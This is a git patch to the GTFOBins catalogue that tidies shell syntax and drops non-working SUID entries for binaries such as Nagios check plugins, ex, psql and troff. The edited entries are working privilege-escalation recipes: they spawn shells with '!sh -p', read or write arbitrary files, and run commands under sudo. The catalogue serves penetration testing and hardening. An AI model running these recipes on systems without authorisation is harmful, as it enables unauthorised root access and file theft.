From 764b2685bc05cf350b4f2ece0e6439d7eda6158e Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:56:48 +0100 Subject: [PATCH] Syntax cleanup, removed some non-working SUID entries --- _gtfobins/check_by_ssh.md | 24 ++++++++---------------- _gtfobins/check_cups.md | 8 ++------ _gtfobins/check_log.md | 16 ++++------------ _gtfobins/check_memory.md | 8 ++------ _gtfobins/check_raid.md | 8 ++------ _gtfobins/check_ssl_cert.md | 34 +++++++++++++--------------------- _gtfobins/check_statusfile.md | 8 ++------ _gtfobins/column.md | 6 +++--- _gtfobins/ex.md | 8 ++++---- _gtfobins/psql.md | 14 +++++++------- _gtfobins/rev.md | 6 +++--- _gtfobins/ss.md | 6 +++--- _gtfobins/ssh-keyscan.md | 6 +++--- _gtfobins/tbl.md | 6 +++--- _gtfobins/troff.md | 6 +++--- _gtfobins/xmodmap.md | 6 +++--- 16 files changed, 65 insertions(+), 105 deletions(-) diff --git a/_gtfobins/check_by_ssh.md b/_gtfobins/check_by_ssh.md index dedf47b..e00730e 100644 --- a/_gtfobins/check_by_ssh.md +++ b/_gtfobins/check_by_ssh.md @@ -4,26 +4,18 @@ description: | functions: command: - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" + COMMAND=id + OUTPUT=output_file TF=$(mktemp) - echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF - check_by_ssh -F "$TF" -H localhost -C something - cat $OUTPUT - suid: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" - TF=$(mktemp) - echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF - check_by_ssh -F "$TF" -H localhost -C something + echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF + check_by_ssh -F $TF -H localhost -C something cat $OUTPUT sudo: - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" + COMMAND=id + OUTPUT=output_file TF=$(mktemp) - echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF - check_by_ssh -F "$TF" -H localhost -C something + echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF + sudo check_by_ssh -F $TF -H localhost -C something cat $OUTPUT --- diff --git a/_gtfobins/check_cups.md b/_gtfobins/check_cups.md index 841ec51..225e2ae 100644 --- a/_gtfobins/check_cups.md +++ b/_gtfobins/check_cups.md @@ -5,13 +5,9 @@ functions: file-read: - code: | LFILE=file_to_read - check_cups --extra-opts=@"$LFILE" - suid: - - code: | - LFILE=file_to_read - ./check_cups --extra-opts=@"$LFILE" + check_cups --extra-opts=@$LFILE sudo: - code: | LFILE=file_to_read - sudo check_cups --extra-opts=@"$LFILE" + sudo check_cups --extra-opts=@$LFILE --- diff --git a/_gtfobins/check_log.md b/_gtfobins/check_log.md index f869ad4..023cdbd 100644 --- a/_gtfobins/check_log.md +++ b/_gtfobins/check_log.md @@ -6,25 +6,17 @@ functions: - code: | LFILE=file_to_read OUTPUT=output_file - umask 022 - check_log -F "$LFILE" -O "$OUTPUT" - cat "$OUTPUT" + check_log -F $LFILE -O $OUTPUT + cat $OUTPUT file-write: - code: | LFILE=file_to_write INPUT=output_file - umask 022 - check_log -F "$INPUT" -O "$LFILE" - suid: - - code: | - LFILE=file_to_write - INPUT=output_file - umask 022 - ./check_log -F "$INPUT" -O "$LFILE" + check_log -F $INPUT -O $LFILE sudo: - code: | LFILE=file_to_write INPUT=output_file umask 022 - sudo check_log -F "$INPUT" -O "$LFILE" + sudo check_log -F $INPUT -O $LFILE --- diff --git a/_gtfobins/check_memory.md b/_gtfobins/check_memory.md index d04333a..8ca90eb 100644 --- a/_gtfobins/check_memory.md +++ b/_gtfobins/check_memory.md @@ -5,13 +5,9 @@ functions: file-read: - code: | LFILE=file_to_read - check_memory --extra-opts=@"$LFILE" - suid: - - code: | - LFILE=file_to_read - ./check_memory --extra-opts=@"$LFILE" + check_memory --extra-opts=@$LFILE sudo: - code: | LFILE=file_to_read - sudo check_memory --extra-opts=@"$LFILE" + sudo check_memory --extra-opts=@$LFILE --- diff --git a/_gtfobins/check_raid.md b/_gtfobins/check_raid.md index 2c7c775..ef1e823 100644 --- a/_gtfobins/check_raid.md +++ b/_gtfobins/check_raid.md @@ -5,13 +5,9 @@ functions: file-read: - code: | LFILE=file_to_read - check_raid --extra-opts=@"$LFILE" - suid: - - code: | - LFILE=file_to_read - ./check_raid --extra-opts=@"$LFILE" + check_raid --extra-opts=@$LFILE sudo: - code: | LFILE=file_to_read - sudo check_raid --extra-opts=@"$LFILE" + sudo check_raid --extra-opts=@$LFILE --- diff --git a/_gtfobins/check_ssl_cert.md b/_gtfobins/check_ssl_cert.md index 2e5916d..2401373 100644 --- a/_gtfobins/check_ssl_cert.md +++ b/_gtfobins/check_ssl_cert.md @@ -3,32 +3,24 @@ description: | This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. functions: command: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" + - description: The host example.net must return a certificate via TLS + code: | + COMMAND=id + OUTPUT=output_file TF=$(mktemp) - echo "$COMMAND | tee \"$OUTPUT\"" > $TF + echo "$COMMAND | tee $OUTPUT" > $TF chmod +x $TF - check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS - cat $OUTPUT - suid: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" - umask 022 - TF=$(mktemp) - echo "$COMMAND | tee \"$OUTPUT\"" > $TF - chmod +x $TF - ./check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS + check_ssl_cert --curl-bin $TF -H example.net cat $OUTPUT sudo: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" - umask 022 + - description: The host example.net must return a certificate via TLS + code: | + COMMAND=id + OUTPUT=output_file TF=$(mktemp) - echo "$COMMAND | tee \"$OUTPUT\"" > $TF + echo "$COMMAND | tee $OUTPUT" > $TF chmod +x $TF - sudo check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS + umask 022 + check_ssl_cert --curl-bin $TF -H example.net cat $OUTPUT --- diff --git a/_gtfobins/check_statusfile.md b/_gtfobins/check_statusfile.md index 1812112..dbb297b 100644 --- a/_gtfobins/check_statusfile.md +++ b/_gtfobins/check_statusfile.md @@ -5,13 +5,9 @@ functions: file-read: - code: | LFILE=file_to_read - check_statusfile "$LFILE" - suid: - - code: | - LFILE=file_to_read - ./check_statusfile "$LFILE" + check_statusfile $LFILE sudo: - code: | LFILE=file_to_read - sudo check_statusfile "$LFILE" + sudo check_statusfile $LFILE --- diff --git a/_gtfobins/column.md b/_gtfobins/column.md index 078ec55..af67980 100644 --- a/_gtfobins/column.md +++ b/_gtfobins/column.md @@ -3,13 +3,13 @@ functions: file-read: - code: | LFILE=file_to_read - column "$LFILE" + column $LFILE suid: - code: | LFILE=file_to_read - ./column "$LFILE" + ./column $LFILE sudo: - code: | LFILE=file_to_read - sudo column "$LFILE" + sudo column $LFILE --- diff --git a/_gtfobins/ex.md b/_gtfobins/ex.md index 8063c4e..1029504 100644 --- a/_gtfobins/ex.md +++ b/_gtfobins/ex.md @@ -3,7 +3,7 @@ functions: shell: - code: | ex - !/bin/sh + !sh file-write: - code: | ex file_to_write @@ -20,9 +20,9 @@ functions: sudo: - code: | sudo ex - !/bin/sh - limited-suid: + !sh + suid: - code: | ./ex - !/bin/sh + !sh -p --- diff --git a/_gtfobins/psql.md b/_gtfobins/psql.md index f2a9b74..ae7b794 100644 --- a/_gtfobins/psql.md +++ b/_gtfobins/psql.md @@ -4,15 +4,15 @@ functions: - code: | psql \? - !/bin/sh - sudo: - - code: | - psql - \? - !/bin/sh + !sh suid: - code: | psql \? - !/bin/sh + !sh -p + sudo: + - code: | + psql + \? + !sh --- diff --git a/_gtfobins/rev.md b/_gtfobins/rev.md index 7fe91c3..4e27759 100644 --- a/_gtfobins/rev.md +++ b/_gtfobins/rev.md @@ -3,13 +3,13 @@ functions: file-read: - code: | LFILE=file_to_read - rev "$LFILE" | rev + rev $LFILE | rev suid: - code: | LFILE=file_to_read - ./rev "$LFILE" | rev + ./rev $LFILE | rev sudo: - code: | LFILE=file_to_read - sudo rev "$LFILE" | rev + sudo rev $LFILE | rev --- diff --git a/_gtfobins/ss.md b/_gtfobins/ss.md index 082acd4..28d4bce 100644 --- a/_gtfobins/ss.md +++ b/_gtfobins/ss.md @@ -5,13 +5,13 @@ functions: file-read: - code: | LFILE=file_to_read - ss -a -F "$LFILE" + ss -a -F $LFILE suid: - code: | LFILE=file_to_read - ./ss -a -F "$LFILE" + ./ss -a -F $LFILE sudo: - code: | LFILE=file_to_read - sudo ss -a -F "$LFILE" + sudo ss -a -F $LFILE --- diff --git a/_gtfobins/ssh-keyscan.md b/_gtfobins/ssh-keyscan.md index 3f7f1d7..e5bb84c 100644 --- a/_gtfobins/ssh-keyscan.md +++ b/_gtfobins/ssh-keyscan.md @@ -5,13 +5,13 @@ functions: file-read: - code: | LFILE=file_to_read - ssh-keyscan -f "$LFILE" + ssh-keyscan -f $LFILE suid: - code: | LFILE=file_to_read - ./ssh-keyscan -f "$LFILE" + ./ssh-keyscan -f $LFILE sudo: - code: | LFILE=file_to_read - sudo ssh-keyscan -f "$LFILE" + sudo ssh-keyscan -f $LFILE --- diff --git a/_gtfobins/tbl.md b/_gtfobins/tbl.md index f78c5b8..93ec6fa 100644 --- a/_gtfobins/tbl.md +++ b/_gtfobins/tbl.md @@ -5,13 +5,13 @@ functions: file-read: - code: | LFILE=file_to_read - tbl "$LFILE" + tbl $LFILE suid: - code: | LFILE=file_to_read - ./tbl "$LFILE" + ./tbl $LFILE sudo: - code: | LFILE=file_to_read - sudo tbl "$LFILE" + sudo tbl $LFILE --- diff --git a/_gtfobins/troff.md b/_gtfobins/troff.md index 82f59c3..52a2bdc 100644 --- a/_gtfobins/troff.md +++ b/_gtfobins/troff.md @@ -5,13 +5,13 @@ functions: file-read: - code: | LFILE=file_to_read - troff "$LFILE" + troff $LFILE suid: - code: | LFILE=file_to_read - ./troff "$LFILE" + ./troff $LFILE sudo: - code: | LFILE=file_to_read - sudo troff "$LFILE" + sudo troff $LFILE --- diff --git a/_gtfobins/xmodmap.md b/_gtfobins/xmodmap.md index 8c32456..8d23cb1 100644 --- a/_gtfobins/xmodmap.md +++ b/_gtfobins/xmodmap.md @@ -5,13 +5,13 @@ functions: file-read: - code: | LFILE=file_to_read - xmodmap -v "$LFILE" + xmodmap -v $LFILE suid: - code: | LFILE=file_to_read - ./xmodmap -v "$LFILE" + ./xmodmap -v $LFILE sudo: - code: | LFILE=file_to_read - sudo xmodmap -v "$LFILE" + sudo xmodmap -v $LFILE ---